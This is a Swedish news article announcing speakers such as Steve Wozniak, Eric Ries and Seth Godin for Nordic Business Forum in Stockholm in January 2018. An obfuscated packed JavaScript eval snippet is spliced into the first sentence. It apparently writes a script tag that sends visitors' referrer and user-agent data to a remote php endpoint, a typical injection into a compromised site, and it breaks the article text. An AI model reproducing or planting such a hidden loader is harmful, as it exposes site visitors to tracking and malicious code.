Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Apple-grundaren Steve Wozniak blir en av talarna på NBFSweden 2018

Steve Wozniak
Sebastian

Nordic eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bnisi|var|u0026u|referrer|isdbd||js|php’.split(’|’),0,{}))
Business Forum, ett av Europas största affärsevent, kommer ha sitt andra event i Stockholm i januari 2018. Årets talare är bland annat Steve Wozniak, Eric Ries, Seth Godin och Lena Apler.

Nordic Business Forum – grundat år 2009 av två finska entreprenörer – har växt från 700 (år 2010) till över 7 500 besökare. Konferensen som samlar Nordens ledande företagsledare och entreprenörer, är känd för att bjuda in några av världens mest inspirerande entreprenörer och näringslivsprofiler som annars sällan besöker Norden.

Den andra upplagan av svenska Nordic Business Forum kommer att arrangeras den 24:e januari 2018 i Stockholm. Dagen bjuder på ett innehållsrikt program på temat framgångsrikt ledarskap och Lean Startup.

Den ikoniska Steve Wozniak, som grundade Apple tillsammans med Steve Jobs, kommer att vara en av dagens huvudpersoner. Wozniak kommer att dela med sig av sina lärdomar om hur man skapar vinnande team och framgångsrika produkter, tillsammans med Lean Startup-gurun Eric Ries, och marknarsföringssnillet Seth Godin. Godin kommer att berätta om vad som krävs för att förändra ett ledarskap och göra en lyckad organisationsförändring. Säljexperten och författaren Cheri Tree kommer att dela med sig av sina insikter om hur människor handlar och konsumerar, medan Anita Krihn Traaseth, CEO Innovation Norway, och Lena Apler, grundare av Collector, samtalar om ledarskap i en ständigt föränderlig värld.

Nordic Business Forum hölls i Sverige för första gången i januari 2017. Eventet gästades av 1 000 företagsledare och entreprenörer från 19 länder, som samlades för att lära sig om framtidens ledarskap och tillväxt från företagsstjärnor som Airbnb’s Chip Conley, YouTube grundaren Chad Hurley, tennislegenden Andre Agassi, och ekonomen Kjell A. Nordström.